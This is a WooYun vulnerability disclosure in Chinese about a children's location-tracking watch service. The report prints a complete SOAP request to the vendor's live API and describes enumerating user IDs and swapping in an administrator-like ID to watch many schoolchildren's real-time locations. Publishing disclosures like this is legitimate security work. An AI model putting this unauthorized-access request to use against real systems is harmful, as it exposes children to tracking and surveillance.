当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113191

漏洞标题:关爱星儿童监听手表存在任意用户登录漏洞(可监控小学生用户)

相关厂商:关爱星

漏洞作者: 小手冰凉

提交时间:2015-05-20 19:38

修复时间:2015-07-04 19:40

公开时间:2015-07-04 19:40

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

关爱星儿童监听手表存在任意用户登录漏洞(可监控小学生用户)

详细说明:

新闻如下
http://news.ifeng.com/a/20150508/43716946_0.shtml
使用者多为小学生
使用关爱星程序后,试出一个弱口令,然后登录抓包。发现登陆后会返回一个id号,所有操作均只要这个id就行,id又是可遍历的。查询设备的数据包如下

POST /OpenAPIV2.asmx HTTP/1.1
Host: grapi.5gcity.com
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 431
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-cn
SOAPAction: http://tempuri.org/GetDeviceList
Connection: close
User-Agent: %E5%85%B3%E7%88%B1%E6%98%9F/1.1 CFNetwork/711.1.16 Darwin/14.0.0
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>
<GetDeviceList xmlns="http://tempuri.org/"><ID>1</ID><PageNo>1</PageNo><PageCount>9999</PageCount><TypeID>0</TypeID><IsAll>false</IsAll><MapType>Google</MapType></GetDeviceList></soap:Body>
</soap:Envelope>


修改其中的ID就能获得指定ID的设备信息。
测试遍历ID后发现id为20929的用户名下竟然有几千个设备,估计是校长的账号,
添加数据包修改规则,把所有请求中的ID替换为校长的ID,实现任意ID登录,效果如图,可看事实位置,可看动态变化,动态信息等等

漏洞证明:

IMG_0855.PNG


IMG_0856.PNG


IMG_0855.PNG

修复方案:

版权声明:转载请注明来源 小手冰凉@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)